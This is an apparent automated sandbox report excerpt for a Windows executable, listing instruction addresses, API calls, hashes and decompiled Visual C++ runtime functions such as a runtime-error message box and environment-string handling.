                                                                  0x0040886e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00408870
                                                                  0x00408871
                                                                  0x00408871
                                                                  0x00408872
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00408874
                                                                  0x00408874
                                                                  0x00408877
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00408877
                                                                  0x00408863
                                                                  0x00408866
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004088a2
                                                                  0x004088a5
                                                                  0x004088b5
                                                                  0x004088b5
                                                                  0x004088b8
                                                                  0x004088fe
                                                                  0x004088fe
                                                                  0x00000000
                                                                  0x004088fe
                                                                  0x0040887d
                                                                  0x0040887d
                                                                  0x00000000
                                                                  0x0040887d
                                                                  0x004088a7
                                                                  0x004088aa
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00408881
                                                                  0x00408884
                                                                  0x00408884
                                                                  0x00408887
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00408889
                                                                  0x0040888b
                                                                  0x0040888b
                                                                  0x0040888e
                                                                  0x00408891
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00408897
                                                                  0x0040889a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004088ac
                                                                  0x004088ac
                                                                  0x004088ae
                                                                  0x004088ae
                                                                  0x004088af
                                                                  0x004088af
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00408906
                                                                  0x0040890d
                                                                  0x0040890d
                                                                  0x0040890f
                                                                  0x0040890f
                                                                  0x00408916
                                                                  0x00408927
                                                                  0x0040892d
                                                                  0x00408933
                                                                  0x00408933
                                                                  0x00408918
                                                                  0x00408918
                                                                  0x0040891e
                                                                  0x00408923
                                                                  0x00408924
                                                                  0x00408924
                                                                  0x00408936
                                                                  0x00408938
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040893a
                                                                  0x00408940
                                                                  0x00408940
                                                                  0x00408944
                                                                  0x0040894a
                                                                  0x00408951
                                                                  0x00000000
                                                                  0x00408951
                                                                  0x0040894c
                                                                  0x0040894e
                                                                  0x0040894e
                                                                  0x00408956
                                                                  0x00408959
                                                                  0x00408959
                                                                  0x00408960
                                                                  0x00408971
                                                                  0x00408977
                                                                  0x0040897d
                                                                  0x0040897d
                                                                  0x00408962
                                                                  0x00408962
                                                                  0x00408968
                                                                  0x0040896d
                                                                  0x0040896e
                                                                  0x0040896e
                                                                  0x00408980
                                                                  0x00408982
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00408984
                                                                  0x00408986
                                                                  0x00408986
                                                                  0x00408989
                                                                  0x00408989
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004088bc
                                                                  0x004088c0
                                                                  0x004088ec
                                                                  0x004088ee
                                                                  0x004088ee
                                                                  0x004088ef
                                                                  0x00000000
                                                                  0x004088ef
                                                                  0x004088c2
                                                                  0x004088c5
                                                                  0x004088c5
                                                                  0x004088c8
                                                                  0x004088c8
                                                                  0x004088cb
                                                                  0x004088ce
                                                                  0x004088e4
                                                                  0x004088e4
                                                                  0x004088e6
                                                                  0x004088e6
                                                                  0x00000000
                                                                  0x004088e6
                                                                  0x004088d0
                                                                  0x004088d1
                                                                  0x004088d1
                                                                  0x004088d2
                                                                  0x0040898c
                                                                  0x0040898c
                                                                  0x0040898e
                                                                  0x00408991
                                                                  0x00408995
                                                                  0x00408997
                                                                  0x00408a76
                                                                  0x00408a78
                                                                  0x00408a7a
                                                                  0x00408a7c
                                                                  0x00408a7e
                                                                  0x00408a9c
                                                                  0x00408a9c
                                                                  0x00408a9f
                                                                  0x00408a9f
                                                                  0x00408aa3
                                                                  0x00408aa6
                                                                  0x00408aa9
                                                                  0x00408ab1
                                                                  0x00408ab6
                                                                  0x00408ab6
                                                                  0x0040899d
                                                                  0x0040899f
                                                                  0x004089a0
                                                                  0x004089a3
                                                                  0x004089ba
                                                                  0x004089a5
                                                                  0x004089a5
                                                                  0x004089a9
                                                                  0x004089ab
                                                                  0x004089ab
                                                                  0x004089ab
                                                                  0x004089ab
                                                                  0x004089ae
                                                                  0x004089b4
                                                                  0x004089b5
                                                                  0x004089b5
                                                                  0x004089bd
                                                                  0x004089c1
                                                                  0x00408a6c
                                                                  0x00408a6e
                                                                  0x00408a70
                                                                  0x00408a72
                                                                  0x00000000
                                                                  0x004089c7
                                                                  0x004089c7
                                                                  0x004089c7
                                                                  0x004089c8
                                                                  0x004089cb
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004089cd
                                                                  0x004089d0
                                                                  0x004089d0
                                                                  0x004089e0
                                                                  0x004089e5
                                                                  0x004089ed
                                                                  0x004089f0
                                                                  0x004089f2
                                                                  0x004089f2
                                                                  0x004089f4
                                                                  0x004089f7
                                                                  0x004089fa
                                                                  0x004089fc
                                                                  0x004089fc
                                                                  0x004089fc
                                                                  0x004089ff
                                                                  0x00408a02
                                                                  0x00408a04
                                                                  0x00408a04
                                                                  0x00408a04
                                                                  0x00408a07
                                                                  0x00408a0c
                                                                  0x00408a3e
                                                                  0x00408a43
                                                                  0x00408a56
                                                                  0x00408a5b
                                                                  0x00408a5e
                                                                  0x00408a61
                                                                  0x00408a64
                                                                  0x00000000
                                                                  0x00408a67
                                                                  0x00408a45
                                                                  0x00000000
                                                                  0x00408a0e
                                                                  0x00408a0e
                                                                  0x00408a15
                                                                  0x00408a15
                                                                  0x00408a18
                                                                  0x00408a1b
                                                                  0x00408a1e
                                                                  0x00408a21
                                                                  0x00408a21
                                                                  0x00408a25
                                                                  0x00408a87
                                                                  0x00408a8b
                                                                  0x00408a8d
                                                                  0x00408a8f
                                                                  0x00408a91
                                                                  0x00408a93
                                                                  0x00408a93
                                                                  0x00408a95
                                                                  0x00408a95
                                                                  0x00408a27
                                                                  0x00408a27
                                                                  0x00408a29
                                                                  0x00408a2e
                                                                  0x00408a33
                                                                  0x00408a35
                                                                  0x00408a35
                                                                  0x00000000
                                                                  0x00408a25
                                                                  0x00408a0c
                                                                  0x004089c1
                                                                  0x004088d8
                                                                  0x004088d8
                                                                  0x004088dc
                                                                  0x004088de
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00408679
                                                                  0x004088f0
                                                                  0x004088f3
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$c$e
                                                                  • API String ID: 0-1157002505
                                                                  • Opcode ID: 4b4f9f47bf169fc6e893eb3fac79e9aa1e13ce5d6833666158076a4a52f457c5
                                                                  • Instruction ID: c0941829aba0763902a7047e05861c001c5ec1f0414324a8ee4f2841a22028be
                                                                  • Opcode Fuzzy Hash: 4b4f9f47bf169fc6e893eb3fac79e9aa1e13ce5d6833666158076a4a52f457c5
                                                                  • Instruction Fuzzy Hash: EFE1C071E54209CEEB249A64CA057FA7BB1AB40304F68403FD4C1B62D2DB7D8982DB1E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004081BD Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 46%
                                                                  			E004081BD(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x430028 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x43002c; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x430030; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x430028(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x430028 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x43002c = GetProcAddress(_t15, "GetActiveWindow");
					 *0x430030 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}









                                                                  0x004081be
                                                                  0x004081c0
                                                                  0x004081c8
                                                                  0x0040820c
                                                                  0x0040820c
                                                                  0x00408213
                                                                  0x00408217
                                                                  0x0040821b
                                                                  0x0040821d
                                                                  0x00408224
                                                                  0x00408229
                                                                  0x00408229
                                                                  0x00408224
                                                                  0x0040821b
                                                                  0x00000000
                                                                  0x00408238
                                                                  0x004081d5
                                                                  0x004081d9
                                                                  0x00408242
                                                                  0x00000000
                                                                  0x00408242
                                                                  0x004081e7
                                                                  0x004081eb
                                                                  0x004081f0
                                                                  0x00000000
                                                                  0x004081f2
                                                                  0x00408200
                                                                  0x00408207
                                                                  0x00000000
                                                                  0x00408207

                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,00405D39,?,Microsoft Visual C++ Runtime Library,00012010,?,0042BE64,?,0042BEB4,?,?,?,Runtime Error!Program: ), ref: 004081CF
                                                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004081E7
                                                                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004081F8
                                                                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00408205
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                  • API String ID: 2238633743-4044615076
                                                                  • Opcode ID: 7cedbdcbaf6c540aeb56ef2dc27582ceb259dece2884735bb7a61a0d24f0663e
                                                                  • Instruction ID: 00c9f9da1051446ad32bca5aae62b9d905b8717d824a8b33a00b852552db6adb
                                                                  • Opcode Fuzzy Hash: 7cedbdcbaf6c540aeb56ef2dc27582ceb259dece2884735bb7a61a0d24f0663e
                                                                  • Instruction Fuzzy Hash: B3015A31B00711EBC7019FB5BE90B1B3BB8EA487A0315157EE584E2261DB7888058BAD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405E07 Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 61%
                                                                  			E00405E07(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x42bef0);
				_push(E00405B04);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x43001c; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E0040602B(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x43001c; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x430014; // 0x0
								_a28 = _t82;
							}
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E00406060(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E00406060(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x42bb68, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x42bb64, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x43001c = 2;
							goto L5;
						}
					} else {
						 *0x43001c = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}























                                                                  0x00405e0a
                                                                  0x00405e0c
                                                                  0x00405e11
                                                                  0x00405e1c
                                                                  0x00405e1d
                                                                  0x00405e24
                                                                  0x00405e2a
                                                                  0x00405e2f
                                                                  0x00405e35
                                                                  0x00405e7d
                                                                  0x00405e80
                                                                  0x00405e88
                                                                  0x00405e8e
                                                                  0x00405e8f
                                                                  0x00405e8f
                                                                  0x00405e92
                                                                  0x00405e9a
                                                                  0x00405ebc
                                                                  0x00000000
                                                                  0x00405ec2
                                                                  0x00405ec5
                                                                  0x00405ec7
                                                                  0x00405ecc
                                                                  0x00405ecc
                                                                  0x00405edc
                                                                  0x00405eec
                                                                  0x00405eee
                                                                  0x00405ef3
                                                                  0x00000000
                                                                  0x00405ef9
                                                                  0x00405ef9
                                                                  0x00405f04
                                                                  0x00405f09
                                                                  0x00405f0e
                                                                  0x00405f11
                                                                  0x00405f2d
                                                                  0x00000000
                                                                  0x00405f48
                                                                  0x00405f5a
                                                                  0x00405f5c
                                                                  0x00405f61
                                                                  0x00000000
                                                                  0x00405f63
                                                                  0x00405f67
                                                                  0x00405fa9
                                                                  0x00405fb8
                                                                  0x00405fbd
                                                                  0x00405fc0
                                                                  0x00405fc2
                                                                  0x00405fc5
                                                                  0x00405fdf
                                                                  0x00000000
                                                                  0x00405ff9
                                                                  0x00405ffc
                                                                  0x00405ffd
                                                                  0x00405ffe
                                                                  0x00406004
                                                                  0x00406007
                                                                  0x00406000
                                                                  0x00406000
                                                                  0x00406001
                                                                  0x00406001
                                                                  0x0040601a
                                                                  0x0040601e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040601e
                                                                  0x00405f69
                                                                  0x00405f6c
                                                                  0x00406024
                                                                  0x00406024
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405f6c
                                                                  0x00405f67
                                                                  0x00405f61
                                                                  0x00405f2d
                                                                  0x00405ef3
                                                                  0x00405e9c
                                                                  0x00405eae
                                                                  0x00405eae
                                                                  0x00405e37
                                                                  0x00405e37
                                                                  0x00405e38
                                                                  0x00405e3b
                                                                  0x00405e51
                                                                  0x00405e6d
                                                                  0x00405f95
                                                                  0x00405f95
                                                                  0x00405e73
                                                                  0x00405e73
                                                                  0x00000000
                                                                  0x00405e73
                                                                  0x00405e53
                                                                  0x00405e53
                                                                  0x00000000
                                                                  0x00405e53
                                                                  0x00405e51
                                                                  0x00405f9d
                                                                  0x00405fa8

                                                                  APIs
                                                                  • LCMapStringW.KERNEL32(00000000,00000100,0042BB68,00000001,00000000,00000000,766870F0,004303CC,?,?,?,004047B3,?,?,?,00000000), ref: 00405E49
                                                                  • LCMapStringA.KERNEL32(00000000,00000100,0042BB64,00000001,00000000,00000000,?,?,004047B3,?,?,?,00000000,00000001), ref: 00405E65
                                                                  • LCMapStringA.KERNEL32(?,?,?,004047B3,?,?,766870F0,004303CC,?,?,?,004047B3,?,?,?,00000000), ref: 00405EAE
                                                                  • MultiByteToWideChar.KERNEL32(?,004303CD,?,004047B3,00000000,00000000,766870F0,004303CC,?,?,?,004047B3,?,?,?,00000000), ref: 00405EE6
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,004047B3,?,00000000,?,?,004047B3,?), ref: 00405F3E
                                                                  • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,004047B3,?), ref: 00405F54
                                                                  • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,004047B3,?), ref: 00405F87
                                                                  • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,004047B3,?), ref: 00405FEF
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: String$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 352835431-0
                                                                  • Opcode ID: 3e176d850f3e157912cf5d0604c9e190321ecd2d5f30f8489acd1b717ac1efc9
                                                                  • Instruction ID: 6beeeadf9252e2258f47de7e227d78f4bbffcc7d99ad2c5c0d2e90d6f5dc6a32
                                                                  • Opcode Fuzzy Hash: 3e176d850f3e157912cf5d0604c9e190321ecd2d5f30f8489acd1b717ac1efc9
                                                                  • Instruction Fuzzy Hash: E1516971900A0AEFCF228F94DC45A9F7FB5EB48754F20412AF915B12A0D3398961DFA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405C15 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 96%
                                                                  			E00405C15(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x42d558;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x42d5e8) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x42d558; // 0x64000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x42fe38; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x42d308 == 1) {
						_t16 = _t54 + 0x42d55c; // 0x42be64
						_t56 = _t16;
						_t19 = E00406BC0( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00406AD0( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E00406BC0( &_v424) + 1 > 0x3c) {
								_t49 = E00406BC0( &_v424) +  &_v424 - 0x3b;
								E00408250(E00406BC0( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00406AD0( &_v164, "Runtime Error!\n\nProgram: ");
							E00406AE0( &_v164, _t49);
							E00406AE0( &_v164, "\n\n");
							_t12 = _t54 + 0x42d55c; // 0x42be64
							E00406AE0( &_v164,  *_t12);
							_t17 = E004081BD( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}













                                                                  0x00405c15
                                                                  0x00405c1e
                                                                  0x00405c21
                                                                  0x00405c23
                                                                  0x00405c28
                                                                  0x00405c2c
                                                                  0x00405c2f
                                                                  0x00405c35
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405c35
                                                                  0x00405c3a
                                                                  0x00405c3d
                                                                  0x00405c43
                                                                  0x00405c49
                                                                  0x00405c51
                                                                  0x00405d42
                                                                  0x00405d42
                                                                  0x00405d4d
                                                                  0x00405d5f
                                                                  0x00405c68
                                                                  0x00405c6e
                                                                  0x00405c8a
                                                                  0x00405c98
                                                                  0x00405c9e
                                                                  0x00405ca5
                                                                  0x00405ca7
                                                                  0x00405cb7
                                                                  0x00405cd2
                                                                  0x00405cda
                                                                  0x00405cdf
                                                                  0x00405cdf
                                                                  0x00405cee
                                                                  0x00405cfb
                                                                  0x00405d0c
                                                                  0x00405d11
                                                                  0x00405d1e
                                                                  0x00405d34
                                                                  0x00405d3c
                                                                  0x00405c6e
                                                                  0x00405c51
                                                                  0x00405d67

                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00405C82
                                                                  • GetStdHandle.KERNEL32(000000F4,0042BE64,00000000,00000000,00000000,?), ref: 00405D58
                                                                  • WriteFile.KERNEL32(00000000), ref: 00405D5F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: File$HandleModuleNameWrite
                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                  • API String ID: 3784150691-4022980321
                                                                  • Opcode ID: 10d63f0637a7c1d465dd6814740942172016f16cf1e5e2e8e3bd23bd2e835ac3
                                                                  • Instruction ID: 43f947743dc14a68d0a06c153b5a300ad0a280623798cb0b022aff31046b6710
                                                                  • Opcode Fuzzy Hash: 10d63f0637a7c1d465dd6814740942172016f16cf1e5e2e8e3bd23bd2e835ac3
                                                                  • Instruction Fuzzy Hash: E231E572B002186EDF20EA60DC45FDB336CEF45304F95447BF546F6180D6B8AA958E59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405549 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00405549() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x42ff88; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = E0040707A(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E00403EE0(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E0040707A(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E004061CC(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x42ff88 = 2;
					goto L18;
				}
				 *0x42ff88 = 1;
				goto L6;
			}















                                                                  0x0040554b
                                                                  0x0040555a
                                                                  0x0040555c
                                                                  0x0040555e
                                                                  0x00405562
                                                                  0x0040559a
                                                                  0x00405624
                                                                  0x00405672
                                                                  0x00000000
                                                                  0x00405672
                                                                  0x00405626
                                                                  0x00405628
                                                                  0x00405636
                                                                  0x00405638
                                                                  0x0040563a
                                                                  0x00405646
                                                                  0x00405649
                                                                  0x00405651
                                                                  0x00405656
                                                                  0x0040565f
                                                                  0x00405658
                                                                  0x00405658
                                                                  0x00405658
                                                                  0x00405668
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040563c
                                                                  0x0040563c
                                                                  0x0040563c
                                                                  0x0040563c
                                                                  0x0040563d
                                                                  0x00405641
                                                                  0x00405642
                                                                  0x00000000
                                                                  0x0040563c
                                                                  0x00405630
                                                                  0x00405634
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405634
                                                                  0x004055a0
                                                                  0x004055a2
                                                                  0x004055b0
                                                                  0x004055b3
                                                                  0x004055b5
                                                                  0x004055c5
                                                                  0x004055d1
                                                                  0x004055d8
                                                                  0x004055de
                                                                  0x004055e2
                                                                  0x004055e5
                                                                  0x004055ed
                                                                  0x004055f1
                                                                  0x00405602
                                                                  0x00405608
                                                                  0x0040560e
                                                                  0x0040560e
                                                                  0x00405612
                                                                  0x00405612
                                                                  0x004055f1
                                                                  0x00405617
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004055b7
                                                                  0x004055b7
                                                                  0x004055b7
                                                                  0x004055b8
                                                                  0x004055b9
                                                                  0x004055bf
                                                                  0x004055c0
                                                                  0x00000000
                                                                  0x004055b7
                                                                  0x004055a6
                                                                  0x004055aa
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004055aa
                                                                  0x00405566
                                                                  0x0040556a
                                                                  0x0040557e
                                                                  0x00405582
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405588
                                                                  0x00000000
                                                                  0x00405588
                                                                  0x0040556c
                                                                  0x00000000
